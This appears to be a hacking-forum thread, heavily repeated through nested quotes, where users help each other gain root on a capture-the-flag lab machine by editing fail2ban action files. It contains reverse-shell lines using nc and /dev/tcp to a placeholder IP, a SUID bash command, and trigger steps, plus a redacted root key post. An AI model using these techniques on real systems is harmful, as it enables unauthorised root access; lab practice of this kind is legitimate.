(June 20, 2022, 06:40 AM)Himitsu Wrote:

(June 20, 2022, 05:54 AM)undeadly Wrote: it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root:
REDACTED

Please edit and remove asap the SSH key in your post.
It's not longer allow to post any private key here.
Previously that will be explained by @Internetdreams then please follow.

(June 20, 2022, 05:54 AM)undeadly Wrote:

(June 19, 2022, 07:11 PM)mimikatz Wrote:

(June 19, 2022, 05:13 PM)Truss46 Wrote:

(June 19, 2022, 05:10 PM)wayxoo Wrote:

(June 19, 2022, 05:04 PM)ryzen Wrote: It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine

hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell 
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned

did you restart the service?

sudo /etc/init.d/fail2ban restart

---

(June 19, 2022, 04:29 PM)ryzen Wrote:

(June 19, 2022, 02:53 PM)Truss46 Wrote: how did you edit the "iptables-multiport.conf" file?

You can delete and recreate the file

thanks   that got me to root :)

That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file.

no, it's not recreated on service restart. there's seems to be another cron which recreates those files.

how i did this:
delete targeted .conf file, copy your malicious file, restart the service, wait for approximately 1 min., attack ssh and it works...


it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root:

(June 20, 2022, 05:54 AM)undeadly Wrote:

(June 19, 2022, 07:11 PM)mimikatz Wrote:

(June 19, 2022, 05:13 PM)Truss46 Wrote:

(June 19, 2022, 05:10 PM)wayxoo Wrote:

(June 19, 2022, 05:04 PM)ryzen Wrote: It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine

hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell 
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned

did you restart the service?

sudo /etc/init.d/fail2ban restart

---

(June 19, 2022, 04:29 PM)ryzen Wrote:

(June 19, 2022, 02:53 PM)Truss46 Wrote: how did you edit the "iptables-multiport.conf" file?

You can delete and recreate the file

thanks   that got me to root :)

That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file.

no, it's not recreated on service restart. there's seems to be another cron which recreates those files.

how i did this:
delete targeted .conf file, copy your malicious file, restart the service, wait for approximately 1 min., attack ssh and it works...


it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root:

(June 20, 2022, 05:54 AM)undeadly Wrote:

(June 19, 2022, 07:11 PM)mimikatz Wrote:

(June 19, 2022, 05:13 PM)Truss46 Wrote:

(June 19, 2022, 05:10 PM)wayxoo Wrote:

(June 19, 2022, 05:04 PM)ryzen Wrote: It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine

hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell 
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned

did you restart the service?

sudo /etc/init.d/fail2ban restart

---

(June 19, 2022, 04:29 PM)ryzen Wrote:

(June 19, 2022, 02:53 PM)Truss46 Wrote: how did you edit the "iptables-multiport.conf" file?

You can delete and recreate the file

thanks   that got me to root :)

That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file.

no, it's not recreated on service restart. there's seems to be another cron which recreates those files.

how i did this:
delete targeted .conf file, copy your malicious file, restart the service, wait for approximately 1 min., attack ssh and it works...


it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root:

(June 20, 2022, 05:03 AM)hacker1111 Wrote:

(June 19, 2022, 10:42 PM)kezekiel Wrote:

(June 19, 2022, 07:11 PM)mimikatz Wrote:

(June 19, 2022, 05:13 PM)Truss46 Wrote:

(June 19, 2022, 05:10 PM)wayxoo Wrote: hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell 
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned

did you restart the service?

sudo /etc/init.d/fail2ban restart

---

(June 19, 2022, 04:29 PM)ryzen Wrote: You can delete and recreate the file

thanks   that got me to root :)

That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file.

Try this

actionban = cp /usr/bin/bash /home/michael && chmod 4755 /home/michael/bash --> ~/bash -p

lol why cp when u giving suid permission to /bin/bash

Image unavailable

(June 20, 2022, 05:54 AM)undeadly Wrote:

(June 19, 2022, 07:11 PM)mimikatz Wrote:

(June 19, 2022, 05:13 PM)Truss46 Wrote:

(June 19, 2022, 05:10 PM)wayxoo Wrote:

(June 19, 2022, 05:04 PM)ryzen Wrote: It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine

hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell 
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned

did you restart the service?

sudo /etc/init.d/fail2ban restart

---

(June 19, 2022, 04:29 PM)ryzen Wrote:

(June 19, 2022, 02:53 PM)Truss46 Wrote: how did you edit the "iptables-multiport.conf" file?

You can delete and recreate the file

thanks   that got me to root :)

That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file.

no, it's not recreated on service restart. there's seems to be another cron which recreates those files.

how i did this:
delete targeted .conf file, copy your malicious file, restart the service, wait for approximately 1 min., attack ssh and it works...


it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root:

(June 20, 2022, 09:25 AM)brox9333 Wrote:

(June 20, 2022, 05:54 AM)undeadly Wrote:

(June 19, 2022, 07:11 PM)mimikatz Wrote:

(June 19, 2022, 05:13 PM)Truss46 Wrote:

(June 19, 2022, 05:10 PM)wayxoo Wrote: hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell 
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned

did you restart the service?

sudo /etc/init.d/fail2ban restart

---

(June 19, 2022, 04:29 PM)ryzen Wrote: You can delete and recreate the file

thanks   that got me to root :)

That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file.

no, it's not recreated on service restart. there's seems to be another cron which recreates those files.

how i did this:
delete targeted .conf file, copy your malicious file, restart the service, wait for approximately 1 min., attack ssh and it works...


it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root:

:(((((((((((((((((((((((((((((((((((

(June 20, 2022, 05:54 AM)undeadly Wrote:

(June 19, 2022, 07:11 PM)mimikatz Wrote:

(June 19, 2022, 05:13 PM)Truss46 Wrote:

(June 19, 2022, 05:10 PM)wayxoo Wrote:

(June 19, 2022, 05:04 PM)ryzen Wrote: It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine

hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell 
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned

did you restart the service?

sudo /etc/init.d/fail2ban restart

---

(June 19, 2022, 04:29 PM)ryzen Wrote:

(June 19, 2022, 02:53 PM)Truss46 Wrote: how did you edit the "iptables-multiport.conf" file?

You can delete and recreate the file

thanks   that got me to root :)

That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file.

no, it's not recreated on service restart. there's seems to be another cron which recreates those files.

how i did this:
delete targeted .conf file, copy your malicious file, restart the service, wait for approximately 1 min., attack ssh and it works...


it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root: